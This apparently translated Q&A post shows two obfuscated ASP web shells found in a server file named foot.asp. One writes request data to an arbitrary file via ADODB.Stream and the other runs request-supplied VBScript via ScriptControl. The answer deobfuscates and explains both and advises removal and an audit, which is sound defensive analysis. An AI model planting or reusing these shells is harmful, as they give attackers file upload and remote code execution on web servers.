我在服务器中找到了一个名为foot.asp的文件,其中包含此代码。
这段代码做什么:
<span> </span>
<%set s=server.createObject("A"&"do"&"db.St"&"re"&"am")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="utf-8"%>
<%s.writetext request("hkfox360")%>
<%s.SaveToFile request("tofile"),2%>
<%s.Close%>
<%set s=nothing%>
另一个代码:
<a> </a>
<%
Set o = Server.CreateObject("Sc"&"ri"&"ptC"&"ont"&"rol")
o.language = "vb"&"scr"&"i"&"pt"
o.addcode(Request("Sj"&"C"&"od"&"e"))
o.run "e",Server,Response,Request,Application,Session,Error
%>
答案 0 :(得分:5)
如果您不知道这些文件来自哪里,您应该假设您的网站恭维。
对于那些希望在安全性较差的网站上造成严重破坏的脚本小子,有许多工具,他们会检查常见的安全漏洞以及使网站容易受到攻击的不良做法,例如SQL注入。
在您的特定情况下,文件已保存到您的服务器上,并且似乎正在收集信息。
Snippet 1 (没有用于否定扫描程序的连接)
<span> </span>
<%set s=server.createObject("Adodb.Stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="utf-8"%>
<%s.writetext request("hkfox360")%>
<%s.SaveToFile request("tofile"),2%>
<%s.Close%>
<%set s=nothing%>
使用ADODB.Stream
对象将Request("hkfox360")
的内容写入由Request("tofile")
值定义的文件中。这表明必须有一个“客户端脚本”元素才能将信息发布到服务器上的此文件中。
Snippet 2 (没有用于否定扫描程序的连接)
<a> </a>
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SjCode"))
o.run "e",Server,Response,Request,Application,Session,Error
%>
使用Microsoft ScriptControl
执行名为e
的子过程并传递参数Server
,Response
,Request
,Application
,Session
和Error
对象基本上为他们提供了他们可能想要从您的网站应用程序中获得的每个上下文。
我的建议是删除这些文件(我至少会将它们移到一个安全的位置,以便对其进行分析)然后进行安全审核,以了解网站的入侵方式。